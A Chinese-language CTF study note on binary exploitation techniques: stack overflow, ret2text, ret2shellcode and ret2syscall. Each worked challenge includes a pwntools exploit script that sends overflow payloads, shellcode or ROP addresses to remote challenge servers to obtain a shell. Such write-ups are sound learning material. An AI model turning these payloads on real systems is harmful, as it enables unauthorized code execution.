CTFpwn學習筆記1-棧溢出

棧溢出

通過寫入超出數組定義范圍的字符長度達到溢出,從而覆蓋棧上其余數據,覆蓋返回地址約等于控制程序執行流

例如:

?經過ida反編譯后,發現這里要將v2的值修改為11.28125才能獲得flag,同時我們可以發現這里使用了gets這個函數,gets函數是存在非常直接的棧溢出漏洞的,我們可以往v1內寫入無限長的數據,同時我們可以ida里看到,v1的范圍是44個字節,v2的位置在v1末尾距離棧頂有4個字節,大小也為4個字節,棧的總大小為0x30也就是48個字節

那么我們就可以通過v2溢出覆蓋v1的值為11.28125,同時我們還需要得到11.28125在匯編里的16進制

找到func函數,并且找到其中匯編的浮點數比較語句

可以看到11.28125的地址為4001F4,同時繼續跟進也可以得到其值為41348000h

那么我們就可以編寫腳本

from pwn import *
p=remote("node4.anna.nssctf.cn",28918)
payload=b'a'*0x2c+p64(0x41348000) #0x2c個字符a用于覆蓋v1變量,p64(0x41348000)用于覆蓋v2
p.recvline()#接收程序向我們輸出的信息
p.sendline(payload)#發送payload
p.interactive()#開啟交互

運行后得到flag

ret2text

原理

  • 劫持控制流,返回到程序自身代碼段(.text)中已有的指令片段(gadgets)。

  • 通常利用程序中已有的system()或危險函數(如execve)的代碼片段。

例題:[BJDCTF 2020]babystack

通過ida打開發現注入點read函數,buf變量可以覆蓋,并且其范圍是12字節,還有一個nbytes變量為4字節

發現存在后門函數backdoor

于是試想利用棧溢出覆蓋返回地址為后門函數的地址從而執行后門函數

編寫腳本,查看后門函數地址

這里我們要先傳入nbytes來控制buf變量接收的字節數

from pwn import *
p=remote("node4.anna.nssctf.cn",28602)
payload=b'a'*0x18+p64(0x4006e6)
p.sendlineafter('name:','500')#在收到‘name’字符串后發送字符串‘500’給變量nbytes
p.sendline(payload)
p.interactive()

運行后成功控制

ret2shellcode

原理

  • 將控制流劫持到用戶輸入的shellcode(一段惡意機器指令)。

  • shellcode通常寫入棧、堆或全局變量(需可執行權限)。

例題:[HNCTF 2022 Week1]ret2shellcode

使用checksec檢查發現是64位程序,并且開啟了NX等保護

在ida中沒有尋找到后門函數,并且題目也提示了,就是讓我們自己寫入一串shell并調用,但是為什么開啟了NX保護還是ret2shellcode呢

其源碼如下

#include<stdio.h>
char buff[256];
int main()
{setbuf(stdin,0);setbuf(stderr,0);setbuf(stdout,0);mprotect((long long)(&stdout)&0xfffffffffffff000,0x1000,7);char buf[256];memset(buf,0,0x100);read(0,buf,0x110);strcpy(buff,buf);return 0;
}

?其中漏洞主要就在

mprotect((long long)(&stdout)&0xfffffffffffff000,0x1000,7);?

read(0,buf,0x110);

?strcpy(buff,buf);

這三條代碼上,定義了buff變量范圍為256個字節,然后這里可以向buf寫入272(0x110)個字節,再把buf復制到buff變量上從而造成溢出,而mprotect((long long)(&stdout)&0xfffffffffffff000,0x1000,7);這條代碼又使.bss段可執行,.bss段存放著全局變量,而buff就是一個全局變量,這就導致了ret2shellcode

所以我們只需要將我們的shell寫入buff變量再將返回地址覆蓋成buff的地址就可以執行shell了

編寫exp

from pwn import *
context.arch="amd64"#設置目標框架為x86-64位也就是64位系統
io=remote('node5.anna.nssctf.cn',24184)
payload=asm(shellcraft.sh()).ljust(264,b'a')+p64(0x4040a0)
io.sendline(payload)
io.interactive()

?執行腳本后成功得到shell

ret2syscall

原理

  • 通過ROP鏈直接調用系統調用(syscall),如execve("/bin/sh", 0, 0)

  • 需構造寄存器參數(x86_64下:rax=59,?rdi="/bin/sh",?rsi=0,?rdx=0)。

構造ROP鏈:

32位:

mov eax,0xb

mov ebx,["/bin/sh"]

mov ecx,0

mov edx,0

int 0x80? ? ? 注意這里int不是整型的意思而是interrupt中斷的意思

64位:

mov rax,59

mov rdi,"/bin/sh"

mov rsi,0

mov rdx,0

syscall

等于execve("/bin/sh",NULL,NULL)

例題:[WUSTCTF 2020]getshell2

使用checksec查看文件,為32位程序并且打開NX

在ida中查看源碼,發現沒有讓棧或堆可執行的代碼,那么就無法ret2shellcode了。

繼續觀察,發現存在假的后門函數,但是system()函數是實實在在存在的,有利用價值

同時漏洞點也給的非常明確了,就在vulnerable函數里,我們通過溢出buf變量,修改返回地址位我們構造的rop鏈,同時我們要填充的范圍也可以得到為28個字節

前面得到call system的地址為0x08048529,再使用ROPgadget尋找/bin/sh字符串

成功找到sh,其地址為0x08048670

于是編寫exp

from pwn import *
io=remote('node5.anna.nssctf.cn',23104)
payload=b'a'*28+p32(0x08048529)+p32(0x08048670)
io.sendline(payload)
io.interactive()

執行后獲得shell

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/91287.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/91287.shtml
英文地址,請注明出處:http://en.pswp.cn/web/91287.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

使用 Android Studio 中的 Gemini,讓 Flutter 開發更便捷

作者 / Flutter 產品經理 Ander Dobo 及 Gemini in Android Studio 產品經理 Sandhya Mohan在 Android Studio 中創建 Android 應用的 Flutter 開發者將迎來一次重大的飛躍: Android Studio 中的 Gemini 已全面支持 Dart 和 Flutter 開發&#xff01;這意味著您可以直接在您青睞…

Deep Learning_ Foundations and Concepts-Springer (2024)【拜讀】前向編碼器20章

Diffusion Models 擴散模型 我們已經了解到&#xff0c;構建強大的生成模型的一種有效方法是&#xff1a;先引入一個關于潛在變量z的分布p(z)&#xff0c;然后使用深度神經網絡將z變換到數據空間x。由于神經網絡具有通用性&#xff0c;能夠將簡單固定的分布轉化為關于x的高度靈…

Spring全局異常處理最佳實踐

全局異常處理器詳解 什么是全局異常處理器&#xff1f; 全局異常處理器是Spring框架提供的統一異常處理機制&#xff0c;用于集中處理應用程序中所有控制器&#xff08;Controller&#xff09;層拋出的異常。它的核心價值在于&#xff1a; 統一異常處理&#xff1a;避免在每個C…

STL學習(十一、常用的算數算法和集合算法)

目錄 一、常用的算數算法 1.accmulate 2.fill 二、常用的集合算法 1.set_intersection 2.set_union 3.set_difference 一、常用的算數算法 包含頭文件為<numeric> 1.accmulate 函數原型 accmulate(iterator beg, iterator end, value) // 計算元素累計和 // …

DeepSort 算法分析詳解

DeepSort 算法分析詳解 DeepSort 簡介 DeepSort (Deep Learning Sort) 是一種基于深度學習的多目標跟蹤算法&#xff0c;由 Wojke 等人于 2017 年提出。它是對傳統 Sort (Simple Online and Realtime Tracking) 算法的改進&#xff0c;通過引入深度特征提取網絡來增強目標關聯的…

基于深度學習的醫學圖像分析:使用Capsule Networks實現醫學圖像分類

前言 醫學圖像分析是計算機視覺領域中的一個重要應用&#xff0c;特別是在醫學圖像分類任務中&#xff0c;深度學習技術已經取得了顯著的進展。醫學圖像分類是指將醫學圖像分配到預定義的類別中&#xff0c;這對于疾病的早期診斷和治療具有重要意義。近年來&#xff0c;Capsule…

G9打卡——ACGAN

&#x1f368; 本文為&#x1f517;365天深度學習訓練營中的學習記錄博客&#x1f356; 原作者&#xff1a;K同學啊 1.導入庫及參數 import argparse import os import numpy as npimport torchvision.transforms as transforms from torchvision.utils import save_imagefrom…

應用war/jar包是用TongWeb企業版,還是嵌入版?

在判斷應用應該采用TongWeb哪個版本時&#xff0c;存在一種錯誤的觀點&#xff1a;如果應用包是jar包&#xff0c;則需要采用TongWeb嵌入版&#xff1b;如果應用包是war包&#xff0c;則需要采用TongWeb企業版。 正確的判斷方法&#xff1a;1. 首先應用為jar包&#xff0c;且符…

Linux ARM 平臺 C 語言操作 Excel 文件的常用庫與工具匯總(支持 xls 和 xlsx)

在 Linux 或嵌入式 ARM 平臺開發中&#xff0c;使用 C 語言操作 Excel 文件是一項常見需求&#xff0c;特別是在工業設備數據采集、日志導出、報表生成等場景。Excel 文件格式復雜&#xff0c;手工解析成本高&#xff0c;因此使用現成的庫可以極大簡化開發工作。 本文整理了若…

Apache Ignite 集群標識(Cluster ID)和集群標簽(Cluster Tag)

這是一個關于 Apache Ignite 集群標識&#xff08;Cluster ID&#xff09;和集群標簽&#xff08;Cluster Tag&#xff09; 的重要配置概念。我們來一步步深入理解這段文檔的含義&#xff0c;并結合實際場景說明其用途。&#x1f9e9; 一、核心概念&#xff1a;Cluster ID 與 C…

基于 Hadoop 生態圈的數據倉庫實踐 —— OLAP 與數據可視化(三)

目錄 三、Impala OLAP 實例 1. 建立 olap 庫、表、視圖 2. 初始裝載數據 3. 修改銷售訂單定期裝載腳本 4. 定義 OLAP 需求 5. 執行 OLAP 查詢 三、Impala OLAP 實例 本節使用前面銷售訂單的例子說明如何使用 Impala 做 OLAP 類型的查詢&#xff0c;以及實際遇到的問題及解…

如何不讓android studio自動換行

一、關閉逗號后自動換行設置 打開設置界面 進入 File → Settings &#xff08;Windows/Linux&#xff09;或 Preferences &#xff08;macOS&#xff09;。 導航至 Editor → Code Style → 選擇語言&#xff08;如 Java 或 Kotlin &#xff09;。 二、修改換行規則…

Jenkinsfile 報錯

Started by user 六件套Obtained Jenkinsfile from git https://gitee.com/duoshuijiao/vitepress-jenkins-cicd-demoorg.codehaus.groovy.control.MultipleCompilationErrorsException: startup failed:WorkflowScript: 28: Expected a step line 28, column 66.fingerprint:…

工業一體機全封閉抗干擾賦能自動化產線高效作業

在自動化產線智能設備等工業場景中&#xff0c;工業一體機的應用面臨多重挑戰&#xff1a;高溫、粉塵、電磁干擾等惡劣環境易導致設備誤操作&#xff0c;傳統工控機平均無故障時間不足4000小時&#xff1b;封閉車間散熱效率低下&#xff0c;風扇散熱失效風險增加&#xff0c;產…

鴻蒙NEXT開發筆記(二十八)仿抖音快手App的把位圖數據轉存為圖片

上一節我們利用Scroller實現了列表項的自動滾動功能&#xff0c;對于圖像列表來說&#xff0c;被選做封面的圖像需要保存為圖片文件&#xff0c;以便向服務器上傳封面圖片。 由于avImageGenerator從視頻提取的圖像幀數據為image.PixelMap&#xff08;位圖格式&#xff09;&…

四、搭建springCloudAlibaba2021.1版本分布式微服務-加入openFeign遠程調用和sentinel流量控制

OpenFeign遠程調用 1、OpenFeign OpenFeign是一種聲明式、模板化的HTTP客戶端。在Spring Cloud中使用OpenFeign&#xff0c;可以做到使用HTTP請求訪問遠程服務&#xff0c;就像調用本地方法一樣的&#xff0c;開發者完全感知不到這是在調用遠程方法&#xff0c;更感知不到在訪問…

網絡安全威脅——APT攻擊_apt攻擊預測案例

APT攻擊 1. 基本概念2. APT的攻擊階段3. APT的典型案例參考 1. 基本概念 高級持續性威脅&#xff08;APT&#xff0c;Advanced Persistent Threat&#xff09;&#xff0c;又叫高級長期威脅&#xff0c;是一種復雜的、持續的網絡攻擊&#xff0c;包含高級、長期、威脅三個要…

順時針旋轉N * N 的矩陣

順時針旋轉題目描述數據范圍實現邏輯代碼實現題目描述 有一個NxN整數矩陣&#xff0c;請編寫一個算法&#xff0c;將矩陣順時針旋轉90度。給定一個NxN的矩陣&#xff0c;和矩陣的階數N,請返回旋轉后的NxN矩陣。數據范圍 0<n<300&#xff0c;矩陣中的值滿足 0≤val≤100…

原生C++實現信號與槽機制:原理詳解

信號與槽機制是一種廣泛應用于事件驅動系統和GUI框架&#xff08;如Qt&#xff09;的設計模式。它允許組件之間通過訂閱-發布模式進行通信&#xff0c;從而實現松耦合的設計。本文將詳細講解如何在原生C中從零開始實現信號與槽機制&#xff0c;并深入探討其工作原理。一、信號與…

【人工智能】OpenAI的AI代理革命:通向超擬人交互的未來之路

人工智能代理(AI Agent)正引領一場深刻的技術變革,其核心在于賦予AI系統感知、規劃、行動和學習的能力,以自主完成復雜任務。OpenAI作為這一領域的先驅,通過其大型語言模型(LLMs)如GPT系列,極大地推動了AI代理的發展,使其在自然語言理解、生成和工具使用方面達到了前所…